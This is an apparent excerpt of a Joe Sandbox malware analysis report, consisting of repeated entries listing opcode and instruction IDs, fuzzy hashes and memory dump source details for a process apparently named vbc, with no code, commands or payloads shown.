                                                                • API String ID:
                                                                • Opcode ID: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                • Instruction ID: a7394cf79072f73ff7064ff76c36bc4da8cdde68a8ae476a2ec17bbed9da5694
                                                                • Opcode Fuzzy Hash: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                • Instruction Fuzzy Hash: 72510E36B11601EBDB269F18C884F3AB77AFF84B60F154468EA0A8F750D635DC01CB91
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                • Instruction ID: 29b0fd1c3e8514aab4ad5fc06ed5c47b1989f06046bbc54bbc35a9a3c4d7ac33
                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                • Instruction Fuzzy Hash: A6519B71E0521AEBCF15DF94C440BEFBBB9BF85350F14406AEA01AB250E734DA45CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6eec1fcd60703ccce3dc19d446083ce479183d570bf6dfeb6552661ac1c07d97
                                                                • Instruction ID: a27a3a1bcdd4d64b1a796c509de987013f0522dd52430995470e8faa45303d14
                                                                • Opcode Fuzzy Hash: 6eec1fcd60703ccce3dc19d446083ce479183d570bf6dfeb6552661ac1c07d97
                                                                • Instruction Fuzzy Hash: 405156716083099FCB54DF2AC885A6BB7E5FFC8215F44492DF89AC7250EB30D905CB96
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48f2e51cbd0f1a588c4f41631a937a06312103253698f0992c48c7da54b436d9
                                                                • Instruction ID: a04163c90356e5499283d71ec11a0390e476e2d787349bde5c7d6c5ba4deaccd
                                                                • Opcode Fuzzy Hash: 48f2e51cbd0f1a588c4f41631a937a06312103253698f0992c48c7da54b436d9
                                                                • Instruction Fuzzy Hash: 78514C716083429FC310DF59D884A6BBBEAFF88754F14496DF895C7291D730E905CBA2
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 13ce52ff0943190868daf33a0ea0431943348bb54bbf60b720e571d8ed1daabc
                                                                • Instruction ID: 05673a6b99633945d1c8eb530e13509d9adbc7898026c7079df7c7f37e4c2ed2
                                                                • Opcode Fuzzy Hash: 13ce52ff0943190868daf33a0ea0431943348bb54bbf60b720e571d8ed1daabc
                                                                • Instruction Fuzzy Hash: 4C51A730604206CAFB2CDE19C554B3BF6A6FB41265F18B72DE807CB790D631CC82EA55
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4fccece3e711c1846076f56c07d3d85dae0fd6dc834b1953325e0e1945ddd808
                                                                • Instruction ID: bfc605bfa328c5932ed23c0ff497ca3cdbc1e3563623fec9b3a68ce09f4bd594
                                                                • Opcode Fuzzy Hash: 4fccece3e711c1846076f56c07d3d85dae0fd6dc834b1953325e0e1945ddd808
                                                                • Instruction Fuzzy Hash: B941C035A00215DBCB19DFA8C444BEEB7B5BF48720F54911AE806F7780E734AC41CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                • Instruction ID: 255a036bf40a4f0885ed918d9e8dbf24bddfdc492ee83337304325a8a0846dac
                                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                • Instruction Fuzzy Hash: F4513975A40615DFCB15CF98C580AAEF7B2FF84710F2882A9D815EB750D734AE42CB90
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4481a136c229413c963290369ba7dd5fc91eeca194be2dd04b51c0587d7a0e0d
                                                                • Instruction ID: 15bd4a6b74b73131fa0d8adaa1a1ce308f5bdc56d8666a2fc35a61187407e6ec
                                                                • Opcode Fuzzy Hash: 4481a136c229413c963290369ba7dd5fc91eeca194be2dd04b51c0587d7a0e0d
                                                                • Instruction Fuzzy Hash: 65512671A042069BCB35CBA8CC09BB8BBB2FF45314F0442A9D41AA76D0DB349982CF94
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d5c594c30712c787d5ce86c856397bb285c9fb155ddd067115d4d6a518cd960a
                                                                • Instruction ID: f1cd46f7e978fff90c6b00ab8cfad188b32f8814ea81486766f513d7bb3d7be0
                                                                • Opcode Fuzzy Hash: d5c594c30712c787d5ce86c856397bb285c9fb155ddd067115d4d6a518cd960a
                                                                • Instruction Fuzzy Hash: 6041A472A007189FEB31DF28C849F7AB7AAFB45714F04049AE84697290E770ED40CBA5
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                • Instruction ID: 07e3ad0fbede4b76bba5eb3f035a2457cf5ae2e23a6d0165d4d40fb65868d25d
                                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                • Instruction Fuzzy Hash: CF41B375B00255ABDF19DF99CC84ABFB7BEBF89210F144069E801AB741D670DE41C7A0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                • Instruction Fuzzy Hash: 2321F5726087059BCB26CF18C840B6B77E5FF88721F054619FE499B380CB70E901CBA2
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5ada7f1f98cfcb587c85726ceb508a400c9dd6e358ca93ed7d5a1004bacfb980
                                                                • Instruction ID: 80f2862e03b610e0ab2db0aa2d8dba45a1a4b6a012f7681fef84064c6db8004b
                                                                • Opcode Fuzzy Hash: 5ada7f1f98cfcb587c85726ceb508a400c9dd6e358ca93ed7d5a1004bacfb980
                                                                • Instruction Fuzzy Hash: C4314D75A10205AFCB14CF5CC8849AE77BAFF88304F15445AE80A9B391E772AD91CF95
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                • Instruction ID: 408aff0de34a60285a8fb2e89ef5e520f79e6e8911bec818a64c1567ad613607
                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                • Instruction Fuzzy Hash: 40319A31600604EFD722CFA8C985F6ABBB9FF84354F1049A9E5128B680E770FE02CB50
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                • Instruction ID: c3d2d93aba9275336e73ae6b4412dbe46cd3439fa208b8383959f3fa9bfe4564
                                                                • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                • Instruction Fuzzy Hash: 81210636705685EBD729EB2CD92AB35B7A6BF40790F0905A4DD4387BD2E364DC41C260
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c623d7e2db3f7f6122ab8d1c40071457bb871f5a0a8b95c20a9ae413c78e69d
                                                                • Instruction ID: 315eca901bc02f02b207c765806629a6e3fbbd9fd7bb0113153c11d8bcfacc8b
                                                                • Opcode Fuzzy Hash: 3c623d7e2db3f7f6122ab8d1c40071457bb871f5a0a8b95c20a9ae413c78e69d
                                                                • Instruction Fuzzy Hash: 56218D71A006299BCF14DF69C885ABEBBF8FF48750F550069E841AB250E778AD41CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 735381dd92cbd4cc75c6f8490993e3265c5cacaab681a187bbb17c4151777b06
                                                                • Instruction ID: 7fc609ee77d31c4e3341d204c3e366ad9782c3db1bf85f63ef96be3d5447047c
                                                                • Opcode Fuzzy Hash: 735381dd92cbd4cc75c6f8490993e3265c5cacaab681a187bbb17c4151777b06
                                                                • Instruction Fuzzy Hash: A621AE71600645AFC725DBA8C948F6AB7B8FF88750F1400A9F905DBBA0D634ED40CB68
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cbf28b74215434a7d9137bb49123867f5bac711387f441fc3254b7bea42dea82
                                                                • Instruction ID: bfd96cc50e7ea4a2cafdb16a716bbc96676b7165313b0a35ea6240dd979f23fb
                                                                • Opcode Fuzzy Hash: cbf28b74215434a7d9137bb49123867f5bac711387f441fc3254b7bea42dea82
                                                                • Instruction Fuzzy Hash: A421AF72A482469BC721EF69D94CF6BBBECBF80360F080856BD8487651D734E905C6A2
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                • Instruction ID: 889f40a61eb211d937050bc9ad76e58fa51a75b7592a0f4fa41149f7ec972652
                                                                • Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                • Instruction Fuzzy Hash: 95318B76605604CFC720CF58C190B26BBE5FB48714F2485ADE94A8BB52DB31E942CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e2d17fd6290b6a51b949bae06e439e3ac7909332daab7756afa2df658805a1cc
                                                                • Instruction ID: 3024c01c9525bc79ca95041ed162e873516f3b24885346d0a89d2d597f20c715
                                                                • Opcode Fuzzy Hash: e2d17fd6290b6a51b949bae06e439e3ac7909332daab7756afa2df658805a1cc
                                                                • Instruction Fuzzy Hash: F4110A72380F117FD7226699DC05F37B69ADBC5B70F11022ABE48DB290EA70DC05C696
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f2d365772ec4c70fc9e5ad8a7626a3c0809d129b6b1bdba36cb457086909880
                                                                • Instruction ID: dcfe4f0f0264919aba244c4ae5505e1d739a1ed178a8c9af856d58a16a665f09
                                                                • Opcode Fuzzy Hash: 2f2d365772ec4c70fc9e5ad8a7626a3c0809d129b6b1bdba36cb457086909880
                                                                • Instruction Fuzzy Hash: C921AC35210B419FC729DF68C801B5677F5FF48B44F2484A8A50ACBB61E731E842CF98
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                • Instruction ID: 03b98b16a2e520f2f2b8c3f75ccfbc453283f759e05e29a28cfac8f9711df835
                                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                • Instruction Fuzzy Hash: 16215872A0020AAFDB129FA4CC44FAEBBFAFF88314F210859F915A7250D634D951CB50
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 63175b3698e5cbfdbacc7697ef9dcefc1d00b9da30574c1a33e93dd143d651e2
                                                                • Instruction ID: 282ca409730d6f9466f326fb7c98a33c6a7b286c80f25ff64007efba8d5411a7
                                                                • Opcode Fuzzy Hash: 63175b3698e5cbfdbacc7697ef9dcefc1d00b9da30574c1a33e93dd143d651e2
                                                                • Instruction Fuzzy Hash: D8219372600604ABC725DB69C898EABBBB9FF88750F14056DF906D7750D634E900CB54
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9c568e9ac3f4a9a322248d20324ae90c8ac018f68fed6aae01a60f0843aa5637
                                                                • Instruction ID: b85eaca95a0fbd17ca12e644a197cdd6bc4de789664718f2407b3df6b68bfd7e
                                                                • Opcode Fuzzy Hash: 9c568e9ac3f4a9a322248d20324ae90c8ac018f68fed6aae01a60f0843aa5637
                                                                • Instruction Fuzzy Hash: 041194377056119BCB66CF4DC5C0A66F7E9FF8A750B1840ADED09AF204D6B2D901C7A0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                • Instruction ID: 45a9f8ab120825e0bdc8ae45aa8120b240c80c302e14fd2ef73859877254a0d4
                                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                • Instruction Fuzzy Hash: 93110473600605BFD7269F94CC48FABBBB9EB80764F1044A9F6048B2D0D671ED44CB54
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                • Instruction ID: e1e0cb14de43ad0f3df38aeda5776426055f3b2fc619a06045badc2fb17e0325
                                                                • Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                • Instruction Fuzzy Hash: 0D215E75A00219EFCB05CF99C884DAEBBB9FF98304B1140A9E805AB351DB319E41CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce8985ad4d4475cd10c9e4a2a33e69a0f112dad8132906e37e29919d7d4ecc7e
                                                                • Instruction ID: ea9272c8775766b20f65898ec80ed51db3df3d3e051280d84043d4c933fd5e4b
                                                                • Opcode Fuzzy Hash: ce8985ad4d4475cd10c9e4a2a33e69a0f112dad8132906e37e29919d7d4ecc7e
                                                                • Instruction Fuzzy Hash: 7D214C76A00205DFCB24CF98C591A6EFBB6FB88318F24416DD105A7350DB71AD0ACBE0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 943028a4985d703ef91098671a74bb23ffd9a86b6c154a5402126386f88a9fe6
                                                                • Instruction ID: 36c12b547c166698500e022ad94579189f4bfeac31ddd813709f83632ceb8a84
                                                                • Opcode Fuzzy Hash: 943028a4985d703ef91098671a74bb23ffd9a86b6c154a5402126386f88a9fe6
                                                                • Instruction Fuzzy Hash: FD215871610A00EFC768CF69C881B76B7E9FF84650F40982DE4AAC7690DA70E860CB64
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dd0a1f6d2372bb470cec33b2640dab31806d205fba50f90b236af364df25c909
                                                                • Instruction ID: d8ba085b66f0c552ca4139df88a208d887abbb33aceabb8aabc189523b5962c6
                                                                • Opcode Fuzzy Hash: dd0a1f6d2372bb470cec33b2640dab31806d205fba50f90b236af364df25c909
                                                                • Instruction Fuzzy Hash: 7811CE76A11205EFCB29CF59C584E6BBBEAAF84610F01507AE9069B350DA70DD11CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b22bd5353f81daf3df4ef5325810307eefef850806f6804fa016df1c7d584e1
                                                                • Instruction ID: 60a2d260d0380c70e32d53fb5e67e69204b29d9410aee794ebc221a0aa553714
                                                                • Opcode Fuzzy Hash: 1b22bd5353f81daf3df4ef5325810307eefef850806f6804fa016df1c7d584e1
                                                                • Instruction Fuzzy Hash: F911A3373143125BD631A71DD886B7AEAD5FB84A50F54081AF50697290DAB0D840C6F9
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                • Instruction ID: 0cc1fdb69b2c3623e1727437af5966d9c61c90c727ff69e0a3b8f8c24f67b65a
                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                • Instruction Fuzzy Hash: 06119132644604EFDF749F44C844B56B7AAFB45764F0584ADEC0A9B250D732DE40D790
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b22b551e81469407ace1bc399e29df264414f5189e01132e88f032d165620f77
                                                                • Instruction ID: 083c980e15988cefe92181f3c09e948cf8628282a9818fd1def2f8dba2a96185
                                                                • Opcode Fuzzy Hash: b22b551e81469407ace1bc399e29df264414f5189e01132e88f032d165620f77
                                                                • Instruction Fuzzy Hash: 02012675309684AFE326A2ADEC59F277B8DFF80390F0904A4F9418B690DA24DC00C3B1
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                • Instruction Fuzzy Hash: BC017C71E1020DEBCB04DFA9D545AAEB7F8EF48300F14406AF905E7391DA74AE01CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11e378221f2e9f6f60a55c4f92769b5206de1d6aa6a6b19732311fb9df3b4dbd
                                                                • Instruction ID: 926738ae1732430c27c147daf59f4f15f3b75a85a15fe42d4b118703dec63693
                                                                • Opcode Fuzzy Hash: 11e378221f2e9f6f60a55c4f92769b5206de1d6aa6a6b19732311fb9df3b4dbd
                                                                • Instruction Fuzzy Hash: CE017171E0020DEBCB04DFA9D545AAEBBF8EF48300F54405AF905E7350DA749D01CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 417fac29eb78dccf8f1d652f275266da14447efdab3c47aeefb54d205dc39f05
                                                                • Instruction ID: 165a44bc9d58e103d9e570fae1ca205aa999b4f3ee1b0dc837cfe8675c7bfd5e
                                                                • Opcode Fuzzy Hash: 417fac29eb78dccf8f1d652f275266da14447efdab3c47aeefb54d205dc39f05
                                                                • Instruction Fuzzy Hash: 20015EB1A0020D9BCB00DFA9D9459AEBBB8EF48350F14005AE901E7340D634AA01CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dc43d85427f90558c1be88b16e37c702412a4e92669dab39857c3c052769ca20
                                                                • Instruction ID: 7da73aba6b45a8345e5a1cd5c23842c1d108998c7629b0488419cd7da0a623a2
                                                                • Opcode Fuzzy Hash: dc43d85427f90558c1be88b16e37c702412a4e92669dab39857c3c052769ca20
                                                                • Instruction Fuzzy Hash: 66012C71A102499BCB04DFA9D545AAEBBB8AF48310F14405AE905A7390EB74AA01CB98
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                • Instruction ID: 6bb37f53542f62dc40271d8e173c311a4b1d1b3a89771b1e31581277f17a5e19
                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                • Instruction Fuzzy Hash: 6CF01D7220001DBFEF029F94DE80DAF7B7DFF892A8B114125FA11A6160D631DD21EBA0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b17be3f9f7c16e1572d045a2be9505f65a8e7e0011f1e8d66cd101328140d4f4
                                                                • Instruction ID: 52556f16ff123e6f19492c59f80eccdff43ae4839476e7ee206f079bf2231e97
                                                                • Opcode Fuzzy Hash: b17be3f9f7c16e1572d045a2be9505f65a8e7e0011f1e8d66cd101328140d4f4
                                                                • Instruction Fuzzy Hash: 19019736110109ABCF129F84DC45EEE3FA6FF4C765F068201FE1966620C632E971EB81
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
